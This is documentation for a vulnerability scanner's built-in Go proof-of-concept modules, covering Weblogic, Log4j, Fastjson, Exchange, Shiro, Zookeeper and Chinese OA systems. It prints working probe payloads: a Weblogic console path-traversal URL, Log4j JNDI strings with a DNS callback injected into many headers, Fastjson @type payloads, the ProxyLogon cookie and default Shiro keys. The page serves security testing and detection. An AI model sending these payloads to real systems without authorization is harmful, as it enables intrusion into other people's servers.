Skip to main content

Overview

scan4all includes native Go POC modules for detecting critical vulnerabilities in enterprise applications. These POCs are compiled into the binary for maximum performance and reliability.

High Performance

Native Go code executes faster than interpreted templates

Critical CVEs

Focus on high-impact vulnerabilities requiring immediate attention

Enterprise Targets

Weblogic, Jenkins, Exchange, VMware, and more

Custom Logic

Complex detection logic not possible in YAML

Supported Systems

Enterprise Middleware

Weblogic Vulnerabilities (11 POCs)

CVESeverityDescription
CVE-2014-4210MediumSSRF vulnerability
CVE-2017-3506CriticalWLS-WSAT RCE
CVE-2017-10271CriticalWLS-WSAT deserialization RCE
CVE-2018-2894HighArbitrary file upload
CVE-2019-2725CriticalWLS9-ASYNC deserialization RCE
CVE-2019-2729CriticalWLS9-ASYNC deserialization RCE
CVE-2020-2883CriticalIIOP/T3 deserialization RCE
CVE-2020-14882CriticalConsole authentication bypass
CVE-2020-14883CriticalConsole RCE
CVE-2021-2109HighUnauthorized JNDI access
Example: CVE-2020-14882
func CVE_2020_14882(url string) bool {
    path := "/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=a"
    if req, err := util.HttpRequset(url+path, "GET", "", false, nil); err == nil {
        if req.StatusCode == 200 && util.StrContains(req.Body, "/console/dashboard") {
            util.SendLog(req.RequestUrl, "CVE-2020-14882", "Found vuln Weblogic", "")
            return true
        }
    }
    return false
}

POC Directory Structure

pocs_go/
├── Springboot/         # Spring framework POCs
   ├── CVE-2022-22965.go
   └── CVE-2022-22947.go
├── apache/             # Apache software POCs
   ├── CVE-2020-13935.go
   └── poc-go-zookeeper-unauth.go
├── confluence/         # Atlassian Confluence
   ├── CVE_2021_26084.go
   ├── CVE-2021-26085.go
   ├── CVE_2022_26134.go
   └── CVE_2022_26138.go
├── f5/                 # F5 BIG-IP
   ├── CVE_2020_5902.go
   ├── CVE_2021_22986.go
   └── CVE_2022_1388.go
├── fastjson/           # Fastjson RCE
   ├── check.go
   └── payloads.go
├── gitlab/             # GitLab
   └── CVE_2021_22205.go
├── jboss/              # JBoss
   └── CVE_2017_12149.go
├── jenkins/            # Jenkins CI
   ├── Unauthorized.go
   ├── CVE_2018_1000110.go
   ├── CVE_2018_1000861.go
   └── CVE_2019_10003000.go
├── log4j/              # Log4Shell
   ├── check.go
   └── payloads.go
├── ms/                 # Microsoft products
   ├── exchange/       # Exchange Server
   ├── CVE_2021_26855.go
   ├── CVE_2018_14847.go (MikroTik)
   └── CVE-2020-0796.go (SMBGhost)
├── phpunit/            # PHPUnit
   └── CVE_2017_9841.go
├── shiro/              # Apache Shiro
   ├── CVE_2016_4437.go
   └── dicts/          # Key dictionaries
├── seeyon/             # Seeyon OA (10 POCs)
├── ThinkPHP/           # ThinkPHP
   └── check.go
├── tomcat/             # Apache Tomcat
   ├── CVE_2017_12615.go
   └── CVE_2020_1938.go
├── VMware/             # VMware products
   └── vCenter/
├── weblogic/           # Oracle Weblogic (11 POCs)
└── go_poc_check.go     # Main dispatcher

Detection Workflow

Execution Logic

func POCcheck(wappalyzertechnologies []string, URL string, finalURL string, checklog4j bool) []string {
    var technologies []string
    
    for tech := range wappalyzertechnologies {
        caseStr := strings.ToLower(wappalyzertechnologies[tech])
        
        switch caseStr {
        case "apache tomcat":
            if tomcat.CVE_2020_1938(HOST) {
                technologies = append(technologies, "exp-Tomcat|CVE-2020-1938")
            }
            if tomcat.CVE_2017_12615(URL) {
                technologies = append(technologies, "exp-Tomcat|CVE-2017-12615")
            }
            
        case "weblogic":
            if weblogic.CVE_2020_14882(URL) {
                technologies = append(technologies, "exp-Weblogic|CVE_2020_14882")
            }
            // ... more checks
            
        case "shiro":
            key := shiro.CVE_2016_4437(finalURL)
            if key != "" {
                technologies = append(technologies, fmt.Sprintf("exp-Shiro|key:%s", key))
            }
        }
    }
    
    return technologies
}

Flow Diagram

Special Detection Categories

Comprehensive Log4j JNDI injection detection:Features:
  • Multiple payload variations
  • Header injection testing (X-Forwarded-For, User-Agent, etc.)
  • POST parameter injection
  • Struts2 specific patterns
  • DNS callback verification
Injection Points:
headers := map[string]string{
    "User-Agent":        payload,
    "X-Api-Version":     payload,
    "X-Forwarded-For":   payload,
    "X-Client-IP":       payload,
    "X-Remote-IP":       payload,
    "X-Real-IP":         payload,
    "Referer":           payload,
    "Cookie":            "JSESSIONID=" + payload,
    "Contact":           payload,
    "Token":             payload,
}
Callback Detection:
uri := randomstr + "." + host + "." + util.CeyeDomain
payload := "${jndi:ldap://" + uri + "}"

// Send payloads...

if util.Dnslogchek(randomstr) {
    util.SendLog(finalURL, "log4j", "Found vuln Log4J JNDI RCE", "")
    return true
}
Multiple Fastjson versions and bypass techniques:Detected Versions:
  • 1.2.24 and earlier
  • 1.2.47 and earlier
  • 1.2.62 and earlier
  • 1.2.66 and earlier
Payloads:
payloads := []string{
    `{"@type":"java.net.Inet4Address","val":"` + dnslog + `"}`,
    `{"@type":"java.net.Inet6Address","val":"` + dnslog + `"}`,
    `{"@type":"java.net.InetSocketAddress"...}`,
    `{"@type":"com.sun.rowset.JdbcRowSetImpl"...}`,
}
ProxyLogon/ProxyShell detection:CVE-2021-26855 (ProxyLogon):
func CheckCVE_2021_26855(host string) string {
    url := "https://" + host + "/owa/auth/x.js"
    headers := map[string]string{
        "Cookie": "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3;",
    }
    
    if req, err := util.HttpRequset(url, "GET", "", false, headers); err == nil {
        if req.StatusCode == 200 {
            return "Found CVE-2021-26855 ProxyLogon"
        }
    }
    return ""
}
Shiro deserialization with key detection:Key Dictionary:
// Built-in key dictionary in shiro/dicts/
keys := []string{
    "kPH+bIxk5D2deZiIxcaaaA==",
    "4AvVhmFLUs0KTA3Kprsdag==",
    "Z3VucwAAAAAAAAAAAAAAAA==",
    // ... 100+ keys
}
Detection:
func CVE_2016_4437(url string) string {
    for _, key := range keys {
        cookie := generateRememberMeCookie(key)
        if testShiroCookie(url, cookie) {
            return key
        }
    }
    return ""
}

OA System Coverage

Chinese OA Systems

10 Vulnerability POCs:
POCType
SeeyonFastjsonRCE
SessionUploadFile Upload
CNVD-2019-19299File Upload
CNVD-2020-62422File Read
CNVD-2021-01627SQL Injection
CreateMysqlSQL Injection
DownExcelBeanServletInfo Leak
GetSessionListSession Disclosure
InitDataAssessAuth Bypass
ManagementStatusInfo Leak

Network Protocol Checks

SMB:
  • MS17-010 detection (EternalBlue)
  • SMBGhost (CVE-2020-0796)
DCOM:
  • Port 135 interface enumeration
  • Remote interface discovery
NetBIOS:
  • NetBIOS enumeration
  • Workstation information
Unauthorized access detection:
func ZookeeperUnauthority(url string) bool {
    conn, err := net.Dial("tcp", url)
    if err != nil {
        return false
    }
    defer conn.Close()
    
    // Send stat command
    conn.Write([]byte("stat\n"))
    
    // Read response
    buf := make([]byte, 1024)
    n, _ := conn.Read(buf)
    
    if strings.Contains(string(buf[:n]), "Zookeeper version") {
        return true
    }
    return false
}

Configuration

Automatic Execution

Go POCs execute automatically when matching fingerprints are detected: 
# No special configuration needed
./scan4all -host target.com

Enable Log4j Scanning

# Log4j requires DNS callback configuration
export ceyeapi="your-api-key"
export ceyedomain="your.ceye.io"
./scan4all -host target.com

Filter by Technology

// Internal fingerprint matching
if fingerprint.Contains("Apache Tomcat") {
    // Execute Tomcat POCs
}

Performance

Native Speed

Compiled Go code executes 10-100x faster than interpreted templates

Low Overhead

Minimal memory footprint and CPU usage

Concurrent Execution

Multiple POCs run in parallel per target

Early Detection

Critical vulns detected first in scan workflow

Output Format

http://target.com [200] [Oracle Weblogic] [exp-Weblogic|CVE_2020_14882] [http://target.com/console]
http://target.com [200] [Apache Shiro] [exp-Shiro|key:Z3VucwAAAAAAAAAAAAAAAA==] [http://target.com]
http://target.com [200] [Apache Tomcat] [exp-Tomcat|CVE-2020-1938] [http://target.com]
Format: URL [Status] [Technology] [Vulnerability|Details] [Final URL]

Development

See Custom POCs for detailed information on creating Go POC modules.

Quick Example

package myservice

import (
    "github.com/GhostTroops/scan4all/lib/util"
)

func CVE_XXXX_XXXXX(url string) bool {
    // Build exploit URL
    exploitPath := "/vulnerable/endpoint?param=payload"
    
    // Send request
    if req, err := util.HttpRequset(url+exploitPath, "GET", "", false, nil); err == nil {
        // Check for vulnerability indicators
        if req.StatusCode == 200 && util.StrContains(req.Body, "vulnerable_marker") {
            util.SendLog(url, "CVE-XXXX-XXXXX", "Vulnerability found", "")
            return true
        }
    }
    
    return false
}

Best Practices

Specific Detection

Use precise vulnerability markers to avoid false positives

Error Handling

Always handle network errors gracefully

Logging

Report findings with sufficient context

Performance

Keep POCs fast - they run on every matching target

Custom POCs

Learn to develop your own Go POC modules

Xray POCs

YAML-based POC system

Fingerprinting

Technology detection system

Development Guide

Extend scan4all capabilities

Build docs developers (and LLMs) love

Get started for freeTalk to us